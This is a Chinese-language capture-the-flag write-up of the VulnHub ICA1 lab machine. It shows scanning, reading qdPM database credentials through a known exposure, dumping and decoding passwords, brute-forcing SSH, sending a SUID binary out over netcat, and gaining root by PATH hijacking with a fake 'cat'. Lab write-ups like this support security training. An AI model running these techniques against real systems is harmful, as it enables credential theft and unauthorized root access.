打靶记录(一五四)之VulnHubIca1

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 15:32 CST
Nmap scan report for 192.168.56.136
Host is up (0.00063s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx
MAC Address: 08:00:27:20:F6:7B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 19.67 seconds

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ sudo nmap -sT -sC -sV -O -p22,80,3306,33060 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 15:33 CST
Nmap scan report for 192.168.56.136
Host is up (0.00076s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
|   256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_  256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp    open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp  open  mysql   MySQL 8.0.26
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.26
|   Thread ID: 42
|   Capabilities flags: 65535
|   Some Capabilities: SwitchToSSLAfterHandshake, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, LongPassword, DontAllowDatabaseTableColumn, ConnectWithDatabase, FoundRows, ODBCClient, SupportsTransactions, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolOld, SupportsCompression, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: CA,.'yiU-u\x14FF*E`v43)
|_  Auth Plugin Name: caching_sha2_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after:  2031-09-23T10:47:29
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
<SNIP>

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ sudo nmap --script=vuln -p22,80,3306,33060 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 15:36 CST
Nmap scan report for 192.168.56.136
Host is up (0.00074s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.136:80/
|     Form id: loginform
|     Form action: http://192.168.56.136/index.php/login
|     
|     Path: http://192.168.56.136:80/index.php/login/restorePassword
|     Form id: restorepassword
|     Form action: /index.php/login/restorePassword
|     
|     Path: http://192.168.56.136:80/index.php/login
|     Form id: loginform
|_    Form action: http://192.168.56.136/index.php/login
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /backups/: Backup folder w/ directory listing
|   /robots.txt: Robots file
|   /batch/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|   /core/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|   /install/: Potentially interesting folder
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|   /manual/: Potentially interesting folder
|   /template/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
3306/tcp  open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
33060/tcp open  mysqlx
MAC Address: 08:00:27:20:F6:7B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 34.31 seconds

Getshell

是一个qdPM,并且能在页面底下看到版本是9.2一个Web项目管理工具

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ searchsploit qdPM            
<SNIP>
qdPM 9.2 - Cross-site Request Forgery (CSRF)                       | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated)                     | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution                                 | multiple/webapps/48146.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

搜一下历史漏洞，存在着密码暴露问题

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ cat 50176.txt                                           
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

访问/core/config/databases.yml能拿到数据库文件

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true  

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ echo "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>" >1.php
                                                                                                     
┌──(mikannse㉿kali)-[~/vulnhub]
└─$ cat 1.php    
<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>
                                                                                                     
┌──(mikannse㉿kali)-[~/vulnhub]
└─$ php -f 1.php       
UcVQCMQk2STVeS6J

然而会出现mariaDBSSL证书问题，折腾了好久

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ mysql -h 192.168.56.136 -u qdpmadmin -p
Enter password: 
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain

在配置文件中加上忽略ssl即可

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ cat /etc/mysql/conf.d/mysql.cnf
[mysql]
skip_ssl

连接之后在staff数据库中找到两张表，一张是用户名一张像是base64编码后的密码

MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id   | department_id | name   | role                      |
+------+---------------+--------+---------------------------+
|    1 |             1 | Smith  | Cyber Security Specialist |
|    2 |             2 | Lucas  | Computer Engineer         |
|    3 |             1 | Travis | Intelligence Specialist   |
|    4 |             1 | Dexter | Cyber Security Analyst    |
|    5 |             2 | Meyer  | Genetic Engineer          |
+------+---------------+--------+---------------------------+
5 rows in set (0.001 sec)

MySQL [staff]> select * login;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id   | user_id | password                 |
+------+---------+--------------------------+
|    1 |       2 | c3VSSkFkR3dMcDhkeTNyRg== |
|    2 |       4 | N1p3VjRxdGc0MmNtVVhHWA== |
|    3 |       1 | WDdNUWtQM1cyOWZld0hkQw== |
|    4 |       3 | REpjZVZ5OThXMjhZN3dMZw== |
|    5 |       5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+

创建用户字典，并且要转小写(linux中几乎不会出现大写用户名)

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ cat username |awk -F '|' '{print $4}' |tr -d " " |awk '{print tolower($0)}' >user

创建密码字典

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ cat password|awk -F '|' '{print $4}' |tr -d " " >pass_base 

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ while IFS= read -r line; do echo -n "$line" | base64 -d; echo; done < pass_base >pass

爆破ssh

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ crackmapexec ssh 192.168.56.136 -u user -p pass --continue-on-success
SSH         192.168.56.136  22     192.168.56.136   [*] SSH-2.0-OpenSSH_8.4p1 Debian-5
<SNIP>
SSH         192.168.56.136  22     192.168.56.136   [+] travis:DJceVy98W28Y7wLg 
SSH         192.168.56.136  22     192.168.56.136   [-] travis:cqNnBWCByS2DuJSy Authentication failed.
SSH         192.168.56.136  22     192.168.56.136   [-] dexter:suRJAdGwLp8dy3rF Authentication failed.
SSH         192.168.56.136  22     192.168.56.136   [+] dexter:7ZwV4qtg42cmUXGX 
<SNIP>

提权

在这个用户的桌面发现一张纸条

dexter@debian:~$ cat note.txt 
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not

有一个SUID的程序/opt/get_access

dexter@debian:/$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 16816 Sep 25  2021 /opt/get_access
-rwxr-sr-x 1 root shadow 31160 Feb  7  2020 /usr/bin/expiry
-rwsr-xr-x 1 root root 58416 Feb  7  2020 /usr/bin/chfn
<SNIP>

将其转移到本地反编译

┌──(mikannse㉿kali)-[~/vulnhub/ica1]
└─$ nc -lvnp 1234 >access
listening on [any] 1234 ...
connect to [192.168.56.131] from (UNKNOWN) [192.168.56.136] 53450

dexter@debian:/$ cat /opt/get_access |nc 192.168.56.131 1234

查看main函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setuid(0);
  setgid(0);
  system("cat /root/system.info");
  if ( socket(2, 1, 0) == -1 )
    puts("Could not create socket to access to the system.");
  else
    puts("All services are disabled. Accessing to the system is allowed only within working hours.\n");
  return 0;
}

发现没有使用绝对路径来使用cat,能够劫持这个命令,通过更改环境变量，那么在/tmp重新写一个cat命令并且将/tmp导入环境变量

dexter@debian:/tmp$ echo "cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash" >cat
dexter@debian:/tmp$ chmod +x cat
dexter@debian:/tmp$ export PATH=/tmp:$PATH
dexter@debian:/tmp$ /opt/get_access 
All services are disabled. Accessing to the system is allowed only within working hours.

dexter@debian:/tmp$ ls
cat
root_bash
systemd-private-2d0996525c3c45a5a6b365c66867de64-apache2.service-a9Np8e
systemd-private-2d0996525c3c45a5a6b365c66867de64-systemd-logind.service-poqsxg
systemd-private-2d0996525c3c45a5a6b365c66867de64-systemd-timesyncd.service-3UXGFg
dexter@debian:/tmp$ ./root_bash -p
root_bash-5.1# whoami
root

碎碎念

大部分时间花在了mariaDB更新之后连接出现的证书问题。。。